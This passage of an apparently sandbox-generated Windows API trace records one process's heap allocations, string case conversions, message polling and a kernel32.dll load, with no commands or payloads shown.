hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0100.406] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0100.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0100.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2400 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0100.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d40 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0100.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0100.406] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0100.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0100.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0100.407] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0100.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0100.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2420 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0100.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0100.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0100.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bf0 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0100.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0100.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0100.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0100.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0100.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0100.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0100.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0100.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0100.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0100.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0100.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0100.409] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0100.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0100.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0100.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0100.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0100.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0100.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0100.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0100.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0100.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0100.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0100.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0100.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0100.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0100.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0100.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0100.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0100.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0100.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0100.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0100.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0100.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0100.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0100.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0100.412] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0100.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0100.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0100.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0100.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0100.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0100.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0100.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0100.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0100.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0100.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0100.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0100.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0100.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0100.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0100.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0100.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0100.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0100.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0100.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0100.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0100.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0100.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0100.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0100.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0100.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0100.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0100.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0100.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0100.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0100.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0100.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0100.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0100.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0100.414] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0100.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0100.414] RtlAllocateHeap (HeapHandle=0x1780000, 